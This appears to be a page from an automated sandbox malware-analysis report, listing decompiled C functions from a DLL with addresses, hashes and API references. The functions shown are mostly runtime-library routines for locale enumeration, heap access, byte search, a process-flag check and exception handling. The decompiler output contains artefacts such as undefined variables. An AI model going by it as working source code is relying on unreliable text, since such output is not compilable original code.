Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: 11bcbf47bce76faa8977a80d5e75a7c6f3f62e1121850a0b7174e698b4f8467c
Instruction ID: 45bdd0b01fd3aec31b6573b782bca8c59e61a4ce9f378ff1fb7cc463c453222b
Opcode Fuzzy Hash: 11bcbf47bce76faa8977a80d5e75a7c6f3f62e1121850a0b7174e698b4f8467c
Instruction Fuzzy Hash: 99F0F43261C245EFDB14AF74D945AFA37A8DB49314F06407AAA02DB280EB78AD458764

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6C336 Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6DA6C336(void* __ecx, void* __edx, signed char* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t11;
				signed char* _t15;
				intOrPtr* _t19;
				intOrPtr _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = E6DA62BDC(__ecx, __edx, _t26);
				_t24 = 2;
				_t19 =  *((intOrPtr*)(_t27 + 0x50));
				_t25 = _t19 + 2;
				do {
					_t11 =  *_t19;
					_t19 = _t19 + _t24;
				} while (_t11 != 0);
				_t4 = _t19 - _t25 >> 1 == 3;
				 *(_t27 + 0x60) = 0 | _t4;
				if(_t4 != 0) {
					_t24 = E6DA6C395( *((intOrPtr*)(_t27 + 0x50)));
				}
				 *((intOrPtr*)(_t27 + 0x5c)) = _t24;
				EnumSystemLocalesW(E6DA6C614, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}

0x6da6c343
0x6da6c349
0x6da6c34a
0x6da6c34d
0x6da6c350
0x6da6c350
0x6da6c353
0x6da6c355
0x6da6c363
0x6da6c366
0x6da6c369
0x6da6c374
0x6da6c374
0x6da6c37d
0x6da6c380
0x6da6c386
0x6da6c38c
0x6da6c38e
0x00000000
0x6da6c38e
0x6da6c394

APIs

Part of subcall function 6DA62BDC: GetLastError.KERNEL32(?,00000008,6DA68ED9), ref: 6DA62BE0
Part of subcall function 6DA62BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA62C82

EnumSystemLocalesW.KERNEL32(6DA6C614,00000001,?,?,-00000050,?,6DA6C9B6,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6DA6C380

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 3aaebe15d25fed6115e30e61a9295809137dce4cf17ea715c2f19ddb7fe020eb
Instruction ID: 0d1a32a4184f8ed6189d7f6fd144d38c18457b1b93a45cd863e1cb1c8263fe49
Opcode Fuzzy Hash: 3aaebe15d25fed6115e30e61a9295809137dce4cf17ea715c2f19ddb7fe020eb
Instruction Fuzzy Hash: 7CF0FC3A20C3459FDF145F35888067ABFA5EF8176CF09442CEA454B580D7755882C764

Uniqueness

Uniqueness Score: -1.00%

Function 6DA66349 Relevance: 1.5, APIs: 1, Instructions: 33
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E6DA66349(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				signed int _t29;
				void* _t31;

				_push(0xc);
				_push(0x6da814e0);
				E6DA59CA0(__ebx, __edi, __esi);
				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
				E6DA5FB12( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				 *0x6daa5b38 = E6DA61CA7( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
				_t29 = EnumSystemLocalesW(E6DA6633C, 1);
				_t17 =  *0x6da83014; // 0xa0d58914
				 *0x6daa5b38 = _t17;
				 *(_t31 - 0x1c) = _t29;
				 *(_t31 - 4) = 0xfffffffe;
				E6DA663B9();
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
				return _t29;
			}

0x6da66349
0x6da6634b
0x6da66350
0x6da66355
0x6da6635e
0x6da66364
0x6da66375
0x6da66387
0x6da66389
0x6da6638e
0x6da66393
0x6da66396
0x6da6639d
0x6da663a7
0x6da663b3

APIs

Part of subcall function 6DA5FB12: RtlEnterCriticalSection.NTDLL(?), ref: 6DA5FB21

EnumSystemLocalesW.KERNEL32(6DA6633C,00000001,6DA814E0,0000000C,6DA6670E,00000000), ref: 6DA66381

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 3b940f43b94fa93386d422561d28c00147294880bd67267c098b6e06a7196224
Instruction ID: 7b20ce4b725c0b552b08dc8be91e2fe434871686b75d2a1d413168efd8dfd1a9
Opcode Fuzzy Hash: 3b940f43b94fa93386d422561d28c00147294880bd67267c098b6e06a7196224
Instruction Fuzzy Hash: A1F037B6A08240EFDB00DF98D540BAC7BF0EB1A725F11815AE610EB290D77549818B91

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6C250 Relevance: 1.5, APIs: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6DA6C250(void* __ecx, void* __edx, signed char* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				intOrPtr* _t15;
				void* _t19;
				void* _t21;
				void* _t22;

				_t19 = E6DA62BDC(__ecx, __edx, _t21);
				_t15 =  *((intOrPtr*)(_t19 + 0x54));
				_t22 = _t15 + 2;
				do {
					_t9 =  *_t15;
					_t15 = _t15 + 2;
				} while (_t9 != 0);
				 *(_t19 + 0x64) = 0 | _t15 - _t22 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(E6DA6C1A9, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}

0x6da6c25c
0x6da6c260
0x6da6c263
0x6da6c266
0x6da6c266
0x6da6c269
0x6da6c26c
0x6da6c284
0x6da6c287
0x6da6c28d
0x6da6c293
0x6da6c295
0x00000000
0x6da6c295
0x6da6c29a

APIs

Part of subcall function 6DA62BDC: GetLastError.KERNEL32(?,00000008,6DA68ED9), ref: 6DA62BE0
Part of subcall function 6DA62BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA62C82

EnumSystemLocalesW.KERNEL32(6DA6C1A9,00000001,?,?,?,6DA6CA14,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6DA6C287

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 15b8659575b8fdcd4ee208e40c3204b5139a914114f8f245025eb031091c73d5
Instruction ID: 2d0f7d4ebb654bee4523f2aaab3da1be50729a53036ac35b79ef15af27195d86
Opcode Fuzzy Hash: 15b8659575b8fdcd4ee208e40c3204b5139a914114f8f245025eb031091c73d5
Instruction Fuzzy Hash: FAF0EC39308245DBDB04AF76D8546667F64EFC1714F0F4059EE058B590C67595C3C760

Uniqueness

Uniqueness Score: -1.00%

Function 6DA66812 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6DA64185,?,20001004,00000000,00000002,?,?,6DA63787), ref: 6DA66846

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 5b4dbacda2ba3e754954ea5fda5cee0a12e750ec4ca3cd98bef1ebed1a56a429
Instruction ID: ce8d5ef27717f4ddf8468103859c519bca210f12b38c7932b73d4fed4deea417
Opcode Fuzzy Hash: 5b4dbacda2ba3e754954ea5fda5cee0a12e750ec4ca3cd98bef1ebed1a56a429
Instruction Fuzzy Hash: F8E04F36508668FBCF022FA0DC08B9E7F69EF46750F098460FE1465362CB7289619AF5

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6A32E Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA6A32E() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x6daa5c48 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x6da6a32e
0x6da6a336
0x6da6a33e

APIs

GetProcessHeap.KERNEL32 ref: 6DA6A32E

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 04baa768673c634221e524d154a19d96b1177b1ef520fe387236df9cacc5c8d5
Instruction ID: 8d492efdb556d18bea95f00c8ea8f586afd6fc3fee2e3bfc0bbb27933d450f7e
Opcode Fuzzy Hash: 04baa768673c634221e524d154a19d96b1177b1ef520fe387236df9cacc5c8d5
Instruction Fuzzy Hash: 19A0113020A3028B8B208E388B0830C3ABCAA0B280B0A8028A008C0080EB2080828A00

Uniqueness

Uniqueness Score: -1.00%

Function 6DA67909 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7ed0a39eeac2346717d51f250d02273998012bcff4f98b92df5f6929e0fc658
Instruction ID: 7c696e7d36d603b451bbb6a5f4350c60ecba6ad81dfc3d900f377df2828efbb6
Opcode Fuzzy Hash: f7ed0a39eeac2346717d51f250d02273998012bcff4f98b92df5f6929e0fc658
Instruction Fuzzy Hash: 3E321526D2DF518DDB239634C922336A26CAFB73C4F15D727E829B5E99EB29C4C34140

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5B200 Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6DA5B200(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										_t12 = _t39 - 4; // -12
										return _t12;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											_t11 = _t39 - 3; // -11
											return _t11;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												_t10 = _t39 - 2; // -10
												return _t10;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						_t9 = _t39 - 1; // -9
						return _t9;
					}
				}
				L24:
			}

0x6da5b200
0x6da5b207
0x6da5b25c
0x6da5b25c
0x6da5b209
0x6da5b209
0x6da5b20f
0x6da5b219
0x6da5b231
0x6da5b231
0x6da5b234
0x6da5b248
0x6da5b248
0x6da5b24b
0x00000000
0x6da5b24d
0x6da5b24d
0x6da5b24d
0x6da5b24f
0x6da5b254
0x00000000
0x00000000
0x6da5b256
0x6da5b259
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6da5b259
0x00000000
0x6da5b24d
0x6da5b236
0x6da5b243
0x6da5b262
0x6da5b264
0x6da5b272
0x6da5b27b
0x00000000
0x6da5b27d
0x6da5b280
0x6da5b282
0x6da5b2a7
0x6da5b2ac
0x6da5b284
0x6da5b284
0x6da5b286
0x6da5b2a1
0x6da5b2a6
0x6da5b288
0x6da5b28b
0x6da5b28d
0x6da5b29b
0x6da5b2a0
0x6da5b28f
0x6da5b291
0x00000000
0x6da5b293
0x00000000
0x6da5b293
0x6da5b291
0x6da5b28d
0x6da5b286
0x6da5b282
0x00000000
0x6da5b25d
0x6da5b25d
0x6da5b25d
0x00000000
0x6da5b247
0x6da5b21b
0x6da5b21b
0x6da5b21b
0x6da5b21d
0x6da5b222
0x00000000
0x00000000
0x6da5b224
0x6da5b227
0x00000000
0x6da5b229
0x6da5b22f
0x00000000
0x00000000
0x00000000
0x00000000
0x6da5b22f
0x00000000
0x6da5b227
0x6da5b296
0x6da5b296
0x6da5b29a
0x6da5b29a
0x6da5b219
0x00000000

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 6fed03204c99b593c769e7e1914bae645d930f1679382548f4e353aa8e9a66f3
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 501129BB24814387D300896EC8B47BEA395EAD622772C4369D0758FA54C133A0E19522

Uniqueness

Uniqueness Score: -1.00%

Function 6DA69229 Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6DA69229(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E6DA66660(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x6da69236
0x6da69238
0x6da6923b
0x6da6923e
0x6da69241
0x6da69252
0x6da69254
0x6da69243
0x6da69247
0x6da69250
0x00000000
0x00000000
0x6da69250
0x6da69259

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 311848273280192d40b1ad7f5b0b063147d93dba66c321036d0fe31074e24a83
Instruction ID: 92ac7e28687de3c298fc1a3d9003ef76cbc4c84e5774c1b8960a44bf8ce3c29d
Opcode Fuzzy Hash: 311848273280192d40b1ad7f5b0b063147d93dba66c321036d0fe31074e24a83
Instruction Fuzzy Hash: D7E08C72919268EBCB14CFA8DA04E8AB3ECEB84B10F1504A6F605D3200C270DE40CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA61610 Relevance: .0, Instructions: 12
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6DA61610(void* __ecx, void* __eflags) {

				if(E6DA69229(__ecx) == 1 || ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) != 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x6da61618
0x6da61631
0x6da6162c
0x6da6162e
0x6da6162e

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a50bd0236d097da5bf19158a0a6e12620a5b0abaf9b60c89cfa537db934b0c82
Instruction ID: 4ddb439ffaae81ba4e55dac347fae417ac3b9008316edd346ee6e84485673af1
Opcode Fuzzy Hash: a50bd0236d097da5bf19158a0a6e12620a5b0abaf9b60c89cfa537db934b0c82
Instruction Fuzzy Hash: EFC08C3C808A80C6CE059B20A3703B473A7A382782F8828CCCA020B641C61E98D2D621

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5C7DF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6DA5C7DF(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6DA5D748(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6DA60BF9(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_t203 = E6DA5C463(_t275, _t279, _t300, _t305, _t319, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6DA5C463(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6DA5A418(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6DA5A34B(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6DA5C75F(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6DA60BF9(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
